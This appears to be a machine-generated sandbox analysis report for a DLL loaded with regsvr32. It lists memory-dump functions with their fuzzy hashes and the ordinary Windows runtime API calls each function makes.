                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                                      • Instruction ID: a8885bbbd8deb659e28c33910928e4ea9ad8e802d57f0785ac04cb05f9903a21
                                                                                                                                      • Opcode Fuzzy Hash: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                                      • Instruction Fuzzy Hash: 802160B0528784AFC398DF28D49981ABBF1FB89344F806A1DF98687350E374D459CB43
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                                      • Instruction ID: 3e7ffcddda8d873ed620f17f9684606eb13d1dd5f0b21141b7977a2e64531d07
                                                                                                                                      • Opcode Fuzzy Hash: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                                      • Instruction Fuzzy Hash: AF217F74529780AFC788DF29C08981EBBE1FB99748F806A1DF88697354D375D445CF42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                                                                                      • Instruction ID: 85e8bde3e512593198615bb83ad7c533a741442781c438c8658c5734f088230b
                                                                                                                                      • Opcode Fuzzy Hash: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                                                                                      • Instruction Fuzzy Hash: AA2148B4508384CBD349DF29D05951BBBE0BB8D75CF900B1DF4CAAB264D7789644CB0A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                                      • Instruction ID: ef74c9938bd6c51c53e44b1bc4647ccc704ebf4b55fa0df2d6028f48b9f67cb3
                                                                                                                                      • Opcode Fuzzy Hash: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                                      • Instruction Fuzzy Hash: C9B09B25B0C754454775470768046155592B7ECBD464441349D0D63B54D93C96404B40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1012874770-0
                                                                                                                                      • Opcode ID: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                                                                                      • Instruction ID: 2743ec9023a94f52dae6de256be5aa69db1a8dd2bcf4192778fda50515695f88
                                                                                                                                      • Opcode Fuzzy Hash: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                                                                                      • Instruction Fuzzy Hash: B041A422E18481C9EA64EB21D4513BCA3F0AFA8B44F056072DB4EBA1A6EE95D845C752
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D0F5
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D111
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D139
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D142
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D158
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D161
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D177
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D180
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D19E
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D1A7
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D1D9
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D1E8
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D240
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D260
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFE23170D4,?,?,?,?,?,00007FFFE2317194), ref: 00007FFFE231D279
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                      • API String ID: 3085332118-232180764
                                                                                                                                      • Opcode ID: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                                                                                      • Instruction ID: b5d12f12902c52f0a45dcce9ba6a4fb81513944c02c7af4b557dfded5b48b591
                                                                                                                                      • Opcode Fuzzy Hash: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                                                                                      • Instruction Fuzzy Hash: 9A513121E1A71788FE68DB51BC4037463D0AFA6B81F4440B6DD5EA3795FFBCE4468A02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFFE23207CE), ref: 00007FFFE23202F9
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFFE23207CE), ref: 00007FFFE232030D
                                                                                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFFE23207CE), ref: 00007FFFE2320410
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CompareErrorInfoLastString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3723911898-0
                                                                                                                                      • Opcode ID: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                                                                                      • Instruction ID: 3ab0b64f9e980e2e0b0f57ff259d20474a2f58b1bb785100fc37b6e9084499fb
                                                                                                                                      • Opcode Fuzzy Hash: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                                                                                      • Instruction Fuzzy Hash: 85E18D23E0C2828EEB308F11954437966D2BBB4794F544575DA5DA7B84EFFCE9488F02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3466867069-0
                                                                                                                                      • Opcode ID: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                                                                                      • Instruction ID: 256f2b981fb10d34948d7ae7e48d6ddaf2053bf4a61bc21022cb3a086a286a72
                                                                                                                                      • Opcode Fuzzy Hash: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                                                                                      • Instruction Fuzzy Hash: B871BD21E0C6124CFA799718944633922E1AFA5780F1C05B7C65EE66E9FFECE445CE03
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1575098132-0
                                                                                                                                      • Opcode ID: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                                                                                      • Instruction ID: abe7ca585887137a850023aac1ba789cd0697f200ddddf61d3cc6ee4cdab9a8f
                                                                                                                                      • Opcode Fuzzy Hash: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                                                                                      • Instruction Fuzzy Hash: 1E311011E0E5428DFE68DB61905177863E1AFA4B44F0421B7DA0EA76C6EF9CE840CB63
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$ErrorInfoLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 189849726-0
                                                                                                                                      • Opcode ID: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                                                                                      • Instruction ID: 22c53afc246442587d3539e4f3987868ccbc65d02cf5172364dbb01704f57e79
                                                                                                                                      • Opcode Fuzzy Hash: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                                                                                      • Instruction Fuzzy Hash: 53B1BB32E086928AEB20CF25A4403B9B7E0FB58B44F844176EB9D97791EFBDD441CB01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 994105223-0
                                                                                                                                      • Opcode ID: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                                      • Instruction ID: 97afb73b41a29f2fa6e6d0a3f8c1e944d218771822c3629ba99a7d4690d3a0cd
                                                                                                                                      • Opcode Fuzzy Hash: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                                                                                      • Instruction Fuzzy Hash: 8B41A622E0C35289EA649B11B544239B7E1FFA4BD0F1404B6DA4EA3B54EFBCF451CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1012874770-0
                                                                                                                                      • Opcode ID: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                                      • Instruction ID: c4d86dde3a944d2ffd5ad2e28dd108bafde9d6b779cbc326b2667a24c51f4d22
                                                                                                                                      • Opcode Fuzzy Hash: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                                                                                      • Instruction Fuzzy Hash: 21412332E096868CEF55DF61C4503B863E0EFA4B54F041073DB0EAA695EFADE491CB52
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3451773520-0
                                                                                                                                      • Opcode ID: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                                      • Instruction ID: 877a6e659a8a8061fdcf1143feeb8a4e33e38f6fde748ade1ab328113aa251f7
                                                                                                                                      • Opcode Fuzzy Hash: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                                                                                      • Instruction Fuzzy Hash: B1A1C427E0964249FA20AB10A50037A62D5FFB0798F1486B5D91DE77C5FFFCE4998B02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFE231E292
                                                                                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFE231E2B1
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFE231E356
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFE231E3B5
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFE231E3F0
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFE231E42C
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFE231E46C
                                                                                                                                      • free.LIBCMT ref: 00007FFFE231E47A
                                                                                                                                      • free.LIBCMT ref: 00007FFFE231E49C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$Infofree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1638741495-0
                                                                                                                                      • Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                                                                                      • Instruction ID: 8a93d04058703345fc2bfc59c671be41691f6fb0fd105c57e60b6799322c220a
                                                                                                                                      • Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                                                                                      • Instruction Fuzzy Hash: CD612B32E086818EE7208F11984077976D1FFA87A4F544A73DA5DA3BD4EFBDD5418B02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2551688548-0
                                                                                                                                      • Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                                      • Instruction ID: ddd9a6f063003ac30d076dc1dd7fe286a2a86417d942c9bb39355cdc249d6983
                                                                                                                                      • Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                                                                                      • Instruction Fuzzy Hash: F2418022E1964248EA509B01EC80379B2D4BFA8B84F5441B6EA4DE3795FFBCE445CF03
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFE2319206), ref: 00007FFFE2318F94
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFE2319206), ref: 00007FFFE2318FA6
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFE2319206), ref: 00007FFFE2319006
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFE2319206), ref: 00007FFFE23190BC
                                                                                                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFE2319206), ref: 00007FFFE23190D3
                                                                                                                                      • free.LIBCMT ref: 00007FFFE23190E4
                                                                                                                                      • GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFE2319206), ref: 00007FFFE2319161
                                                                                                                                      • free.LIBCMT ref: 00007FFFE2319171
                                                                                                                                        • Part of subcall function 00007FFFE231E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFE231E292
                                                                                                                                        • Part of subcall function 00007FFFE231E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFE231E2B1
                                                                                                                                        • Part of subcall function 00007FFFE231E23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFE231E3B5
                                                                                                                                        • Part of subcall function 00007FFFE231E23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFE231E3F0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
